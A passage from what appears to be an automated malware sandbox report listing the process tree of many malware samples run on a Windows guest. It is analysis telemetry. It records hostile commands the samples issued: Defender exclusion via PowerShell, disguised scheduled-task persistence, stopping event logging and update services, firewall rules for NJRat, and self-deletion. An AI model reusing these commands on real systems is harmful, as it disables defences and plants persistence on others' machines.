        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:9256
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:10436
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:11748
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:7688
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:6956
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:11304
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:6004
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:10416
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:10352
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:4448
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:7752
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:7684
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:2624
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:10340
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:12160
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:11408
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:5272
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:2628
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:11520
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:6752
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:1596
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:11048
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:8216
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:3540
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:9732
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:7028
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:1796
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:11440
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:9424
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:11800
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:11232
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:8372
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:10372
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:7692
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:6820
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:8968
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:7144
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:6768
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:2596
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:5900
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:10408
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:7340
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:4884
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:5716
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:10000
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:7024
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:636
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        6⤵
        
        PID:11788
    - - C:\Users\Admin\Desktop\Files\xworm.exe
        
        "C:\Users\Admin\Desktop\Files\xworm.exe"
        5⤵
        
        PID:5084
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        6⤵
        
        PID:568
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 280
        6⤵
        Program crash
        
        PID:7120
    - - C:\Users\Admin\Desktop\Files\EakLauncher.exe
        
        "C:\Users\Admin\Desktop\Files\EakLauncher.exe"
        5⤵
        
        PID:3656
    - - C:\Users\Admin\Desktop\Files\2.exe
        
        "C:\Users\Admin\Desktop\Files\2.exe"
        5⤵
        
        PID:2944
    - - C:\Users\Admin\Desktop\Files\DEF.exe
        
        "C:\Users\Admin\Desktop\Files\DEF.exe"
        5⤵
        
        PID:9140
    - - C:\Users\Admin\Desktop\Files\Statement-415322024.exe
        
        "C:\Users\Admin\Desktop\Files\Statement-415322024.exe"
        5⤵
        
        PID:5804
    - - C:\Users\Admin\Desktop\Files\nc64.exe
        
        "C:\Users\Admin\Desktop\Files\nc64.exe"
        5⤵
        
        PID:5912
    - - C:\Users\Admin\Desktop\Files\system404.exe
        
        "C:\Users\Admin\Desktop\Files\system404.exe"
        5⤵
        
        PID:10032
    - - C:\Users\Admin\Desktop\Files\noll.exe
        
        "C:\Users\Admin\Desktop\Files\noll.exe"
        5⤵
        
        PID:3548
    - - C:\Users\Admin\Desktop\Files\random.exe
        
        "C:\Users\Admin\Desktop\Files\random.exe"
        5⤵
        
        PID:10512
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        6⤵
        Kills process with taskkill
        
        PID:9868
    - - C:\Users\Admin\Desktop\Files\xloaderProtected.exe
        
        "C:\Users\Admin\Desktop\Files\xloaderProtected.exe"
        5⤵
        
        PID:11432
      - C:\Users\Admin\Desktop\Files\xloaderProtected.exe
        
        "C:\Users\Admin\Desktop\Files\xloaderProtected.exe"
        6⤵
        
        PID:7108
    - - C:\Users\Admin\Desktop\Files\Sniffthem.exe
        
        "C:\Users\Admin\Desktop\Files\Sniffthem.exe"
        5⤵
        
        PID:11812
      - C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        6⤵
        
        PID:11916
      - C:\Windows\system32\audiodg.exe
        
        "C:\Windows\system32\audiodg.exe"
        6⤵
        
        PID:11924
      - C:\Windows\system32\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe"
        6⤵
        
        PID:11932
    - - C:\Users\Admin\Desktop\Files\5447jsX.exe
        
        "C:\Users\Admin\Desktop\Files\5447jsX.exe"
        5⤵
        
        PID:9844
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:11196
    - - C:\Users\Admin\Desktop\Files\tt.exe
        
        "C:\Users\Admin\Desktop\Files\tt.exe"
        5⤵
        
        PID:10364
      - C:\Windows\sysmablsvr.exe
        
        C:\Windows\sysmablsvr.exe
        6⤵
        
        PID:2680
        
        C:\Users\Admin\AppData\Local\Temp\2573628883.exe
        
        C:\Users\Admin\AppData\Local\Temp\2573628883.exe
        7⤵
        
        PID:11568
        
        C:\Users\Admin\AppData\Local\Temp\43911819.exe
        
        C:\Users\Admin\AppData\Local\Temp\43911819.exe
        7⤵
        
        PID:6464
        
        C:\Users\Admin\AppData\Local\Temp\99815381.exe
        
        C:\Users\Admin\AppData\Local\Temp\99815381.exe
        7⤵
        
        PID:9252
        
        C:\Users\Admin\AppData\Local\Temp\99815381.exe
        
        "C:\Users\Admin\AppData\Local\Temp\99815381.exe"
        7⤵
        
        PID:9192
        
        C:\Users\Admin\AppData\Local\Temp\1310311649.exe
        
        C:\Users\Admin\AppData\Local\Temp\1310311649.exe
        7⤵
        
        PID:10640
    - - C:\Users\Admin\Desktop\Files\kdmapper_Release.exe
        
        "C:\Users\Admin\Desktop\Files\kdmapper_Release.exe"
        5⤵
        
        PID:8828
    - - C:\Users\Admin\Desktop\Files\Uploader.exe
        
        "C:\Users\Admin\Desktop\Files\Uploader.exe"
        5⤵
        
        PID:8976
    - - C:\Users\Admin\Desktop\Files\dsds.exe
        
        "C:\Users\Admin\Desktop\Files\dsds.exe"
        5⤵
        
        PID:2052
    - - C:\Users\Admin\Desktop\Files\hiya.exe
        
        "C:\Users\Admin\Desktop\Files\hiya.exe"
        5⤵
        
        PID:7156
    - - C:\Users\Admin\Desktop\Files\jsawdtyjde.exe
        
        "C:\Users\Admin\Desktop\Files\jsawdtyjde.exe"
        5⤵
        
        PID:6020
    - - C:\Users\Admin\Desktop\Files\ewrvuh.exe
        
        "C:\Users\Admin\Desktop\Files\ewrvuh.exe"
        5⤵
        
        PID:11392
    - - C:\Users\Admin\Desktop\Files\5.exe
        
        "C:\Users\Admin\Desktop\Files\5.exe"
        5⤵
        
        PID:8344
  - - C:\Users\Admin\Desktop\4363463463464363463463463.exe
      "C:\Users\Admin\Desktop\4363463463464363463463463.exe"
      4⤵
      PID:6308
    - - C:\Users\Admin\Desktop\Files\kiyan.exe
        
        "C:\Users\Admin\Desktop\Files\kiyan.exe"
        5⤵
        
        PID:2536
    - - C:\Users\Admin\Desktop\Files\DIFF.exe
        
        "C:\Users\Admin\Desktop\Files\DIFF.exe"
        5⤵
        
        PID:7044
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
        6⤵
        
        PID:8304
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
        6⤵
        
        PID:8312
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
        6⤵
        
        PID:8316
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
        6⤵
        
        PID:8328
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
        6⤵
        
        PID:8336
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
        6⤵
        
        PID:8340
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
        6⤵
        
        PID:8348
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
        6⤵
        
        PID:8360
    - - C:\Users\Admin\Desktop\Files\qqq.exe
        
        "C:\Users\Admin\Desktop\Files\qqq.exe"
        5⤵
        
        PID:8044
      - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        
        "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
        6⤵
        
        PID:7992
    - - C:\Users\Admin\Desktop\Files\nxmr.exe
        
        "C:\Users\Admin\Desktop\Files\nxmr.exe"
        5⤵
        
        PID:9004
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3552
      - C:\Windows\System32\schtasks.exe
        
        C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
        6⤵
        
        PID:8940
    - - C:\Users\Admin\Desktop\Files\Vidar.exe
        
        "C:\Users\Admin\Desktop\Files\Vidar.exe"
        5⤵
        
        PID:7732
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe"
        6⤵
        
        PID:9068
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Applaunch.exe" & rd /s /q "C:\ProgramData\BKKKEGIDBGHI" & exit
        7⤵
        
        PID:8416
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        8⤵
        Delays execution with timeout.exe
        
        PID:64
    - - C:\Users\Admin\Desktop\Files\4434.exe
        
        "C:\Users\Admin\Desktop\Files\4434.exe"
        5⤵
        
        PID:9472
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:6396
    - - C:\Users\Admin\Desktop\Files\343dsxs.exe
        
        "C:\Users\Admin\Desktop\Files\343dsxs.exe"
        5⤵
        
        PID:10004
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:8892
    - - C:\Users\Admin\Desktop\Files\gagagggagagag.exe
        
        "C:\Users\Admin\Desktop\Files\gagagggagagag.exe"
        5⤵
        
        PID:7704
    - - C:\Users\Admin\Desktop\Files\client.exe
        
        "C:\Users\Admin\Desktop\Files\client.exe"
        5⤵
        
        PID:4448
      - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe
        6⤵
        
        PID:6420
        
        C:\Program Files (x86)\seetrol\client\SeetrolClient.exe
        
        "C:\Program Files (x86)\seetrol\client\SeetrolClient.exe"
        7⤵
        
        PID:5616
        
        C:\Windows\SysWOW64\ipconfig.exe
        
        "C:\Windows\System32\ipconfig.exe" /flushdns
        8⤵
        Gathers network information
        
        PID:9648
    - - C:\Users\Admin\Desktop\Files\kitty.exe
        
        "C:\Users\Admin\Desktop\Files\kitty.exe"
        5⤵
        
        PID:6120
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6120 -s 524
        6⤵
        Program crash
        
        PID:9364
    - - C:\Users\Admin\Desktop\Files\hhnjqu9y.exe
        
        "C:\Users\Admin\Desktop\Files\hhnjqu9y.exe"
        5⤵
        
        PID:5504
    - - C:\Users\Admin\Desktop\Files\bildnewl.exe
        
        "C:\Users\Admin\Desktop\Files\bildnewl.exe"
        5⤵
        
        PID:4548
    - - C:\Users\Admin\Desktop\Files\5_6190317556063017550.exe
        
        "C:\Users\Admin\Desktop\Files\5_6190317556063017550.exe"
        5⤵
        
        PID:11896
    - - C:\Users\Admin\Desktop\Files\NJRat.exe
        
        "C:\Users\Admin\Desktop\Files\NJRat.exe"
        5⤵
        
        PID:8212
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\Desktop\Files\NJRat.exe" "NJRat.exe" ENABLE
        6⤵
        Modifies Windows Firewall
        
        PID:8908
    - - C:\Users\Admin\Desktop\Files\Runtime%20Broker.exe
        
        "C:\Users\Admin\Desktop\Files\Runtime%20Broker.exe"
        5⤵
        
        PID:12024
    - - C:\Users\Admin\Desktop\Files\2r61ahry.exe
        
        "C:\Users\Admin\Desktop\Files\2r61ahry.exe"
        5⤵
        
        PID:64
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        6⤵
        Power Settings
        
        PID:5084
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        6⤵
        Power Settings
        
        PID:11512
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        6⤵
        Power Settings
        
        PID:11192
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        6⤵
        Power Settings
        
        PID:9728
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "VJAODQWN"
        6⤵
        Launches sc.exe
        
        PID:9004
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "VJAODQWN" binpath= "C:\ProgramData\ztngybkovyeb\qsjxfirefkza.exe" start= "auto"
        6⤵
        Launches sc.exe
        
        PID:11236
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        6⤵
        Launches sc.exe
        
        PID:5228
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "VJAODQWN"
        6⤵
        Launches sc.exe
        
        PID:7828
    - - C:\Users\Admin\Desktop\Files\Authenticator222.exe
        
        "C:\Users\Admin\Desktop\Files\Authenticator222.exe"
        5⤵
        
        PID:6380
    - - C:\Users\Admin\Desktop\Files\h5a71wdy.exe
        
        "C:\Users\Admin\Desktop\Files\h5a71wdy.exe"
        5⤵
        
        PID:400
      - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7380
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        
        PID:11904
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        7⤵
        
        PID:10804
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        6⤵
        Launches sc.exe
        
        PID:5988
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        
        PID:7848
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        6⤵
        Launches sc.exe
        
        PID:2444
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        6⤵
        Launches sc.exe
        
        PID:9976
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        6⤵
        Launches sc.exe
        
        PID:5960
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        6⤵
        Power Settings
        
        PID:8792
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        6⤵
        Power Settings
        
        PID:9452
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        6⤵
        Power Settings
        
        PID:1528
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        6⤵
        Power Settings
        
        PID:10888
      - C:\Windows\system32\dialer.exe
        
        C:\Windows\system32\dialer.exe
        6⤵
        
        PID:9800
    - - C:\Users\Admin\Desktop\Files\PXray_Cast_Sort.exe
        
        "C:\Users\Admin\Desktop\Files\PXray_Cast_Sort.exe"
        5⤵
        
        PID:3780
    - - C:\Users\Admin\Desktop\Files\bundle.exe
        
        "C:\Users\Admin\Desktop\Files\bundle.exe"
        5⤵
        
        PID:4664
    - - C:\Users\Admin\Desktop\Files\t1.exe
        
        "C:\Users\Admin\Desktop\Files\t1.exe"
        5⤵
        
        PID:11792
    - - C:\Users\Admin\Desktop\Files\langla.exe
        
        "C:\Users\Admin\Desktop\Files\langla.exe"
        5⤵
        
        PID:10420
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "http" /tr '"C:\Users\Admin\AppData\Roaming\http.exe"' & exit
        6⤵
        
        PID:9996
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "http" /tr '"C:\Users\Admin\AppData\Roaming\http.exe"'
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:9444
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp298.tmp.bat""
        6⤵
        
        PID:6644
    - - C:\Users\Admin\Desktop\Files\Serials_Checker.exe
        
        "C:\Users\Admin\Desktop\Files\Serials_Checker.exe"
        5⤵
        
        PID:6824
    - - C:\Users\Admin\Desktop\Files\ControlledAccessPoint.exe
        
        "C:\Users\Admin\Desktop\Files\ControlledAccessPoint.exe"
        5⤵
        
        PID:7852
    - - C:\Users\Admin\Desktop\Files\ammyadmin.exe
        
        "C:\Users\Admin\Desktop\Files\ammyadmin.exe"
        5⤵
        
        PID:6016
    - - C:\Users\Admin\Desktop\Files\Offnewhere.exe
        
        "C:\Users\Admin\Desktop\Files\Offnewhere.exe"
        5⤵
        
        PID:11228
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4600 -parentBuildID 20240401114208 -prefsHandle 4420 -prefMapHandle 4340 -prefsLen 34057 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {abaf3c7b-6ed4-438b-8c02-73cfb4ae8d6e} 2720 "\\.\pipe\gecko-crash-server-pipe.2720" gpu
      4⤵
      PID:4548
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5604
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  PID:5772
- C:\Windows\System32\dwm.exe
  C:\Windows\System32\dwm.exe
  2⤵
  PID:5796
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5692
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
  2⤵
  PID:6012
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5444
- C:\Windows\System32\dwm.exe
  C:\Windows\System32\dwm.exe
  2⤵
  PID:4248
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1764
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
  2⤵
  PID:5888
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
